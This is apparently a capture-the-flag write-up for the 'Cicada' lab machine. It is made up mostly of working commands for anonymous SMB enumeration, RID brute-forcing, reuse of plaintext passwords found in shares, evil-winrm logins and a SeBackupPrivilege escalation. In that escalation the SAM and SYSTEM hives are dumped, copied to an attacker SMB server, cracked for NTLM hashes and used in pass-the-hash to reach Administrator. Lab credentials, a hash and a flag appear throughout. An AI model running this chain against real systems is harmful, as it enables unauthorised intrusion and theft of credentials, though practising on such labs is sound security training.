Cicada

smbclient \\\\10.10.11.35\\DEV -U 'david.orelious' -p 'aRt$Lp#7t*VQ!3'
--------------------------------------------------------------------
cat Backup_script.ps1 

$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
--------------------------------------------------------------------
evil-winrm -i 10.10.11.35 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
----------------------------------------------
user.txt: 1d12de2c4162688e2ee9ba080c707d96
-----------------------------------------------------
reg save hklm\system c:\Temp\system


copy C:\Temp\sam \\10.10.16.53\share\sam
copy C:\Temp\system \\10.10.16.53\share\system

evil-winrm -i 10.10.11.35 -u Administrator -H 2b87e7c93a3e8a0ea4a581937016f341

Initial Access

Enumerate SMB Shares:
- Used smbclient to list accessible shares:
  smbclient -L \\\\10.10.11.35 -U "anonymous"
- Found the HR share and accessed it:
  smbclient \\\\10.10.11.35\\HR -U "anonymous"
Found Credentials:
- Discovered a file containing credentials:
  Cicada$M6Corpb*@Lp#nZp!8
Enumerate Users:
- Used nxc to enumerate users via RID brute-forcing:
  nxc smb 10.10.11.35 -u 'anonymous' -p '' --rid-brute
- Identified users like michael.wrightson, david.orelious, and emily.oscars.
Authenticate as michael.wrightson:
- Used the found credentials to authenticate:
  nxc smb 10.10.11.35 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8'

Explore SMB Shares:

Found additional shares and accessed the dev share:

smbclient \\\\10.10.11.35\\dev -U 'michael.wrightson%'Cicada$M6Corpb*@Lp#nZp!8'

Found New Credentials:
- Discovered credentials for emily.oscars:
  emily.oscars:Q!3@Lp#M6b*7t*Vt

Authenticate as emily.oscars:

Used evil-winrm to authenticate:

evil-winrm -i 10.10.11.35 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'

Privilege Escalation

Check Privileges:
- Ran whoami /priv and found SeBackupPrivilege and SeRestorePrivilege enabled.

Dump SAM and SYSTEM Hives:

Created a Temp folder and dumped the hives:

cd c:\
mkdir Temp
reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\system

Transfer Files Using SMB Server:
- Set up an SMB server on the attacking machine:
  sudo impacket-smbserver share $(pwd) -smb2support
- Copied the files to the SMB share from the target machine:
  copy C:\Temp\sam \\<Your_IP>\share\sam copy C:\Temp\system \\<Your_IP>\share\system

Extract NTLM Hashes:

Used pypykatz to extract the hashes:

pypykatz registry --sam sam --system system

Found the NTLM hash for the Administrator:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::

Authenticate as Administrator:

Used evil-winrm with the NTLM hash:

evil-winrm -i 10.10.11.35 -u Administrator -H 2b87e7c93a3e8a0ea4a581937016f341

Retrieve the Root Flag:
- Navigated to the Administrator desktop and read the root.txt file:
  cd C:\Users\Administrator\Desktop type root.txt

PreviousEscape two NextHTB Permx Machine(CVE-2023–4220 Chamilo LMS)

Last updated 3 months ago

Was this helpful?

smbclient \\\\10.10.11.35\\DEV -U 'david.orelious' -p 'aRt$Lp#7t*VQ!3' -------------------------------------------------------------------- cat Backup_script.ps1 $sourceDirectory = "C:\smb" $destinationDirectory = "D:\Backup" $username = "emily.oscars" $password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force $credentials = New-Object System.Management.Automation.PSCredential($username, $password) $dateStamp = Get-Date -Format "yyyyMMdd_HHmmss" $backupFileName = "smb_backup_$dateStamp.zip" $backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath" -------------------------------------------------------------------- evil-winrm -i 10.10.11.35 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' ---------------------------------------------- user.txt: 1d12de2c4162688e2ee9ba080c707d96 ----------------------------------------------------- reg save hklm\system c:\Temp\system copy C:\Temp\sam \\10.10.16.53\share\sam copy C:\Temp\system \\10.10.16.53\share\system evil-winrm -i 10.10.11.35 -u Administrator -H 2b87e7c93a3e8a0ea4a581937016f341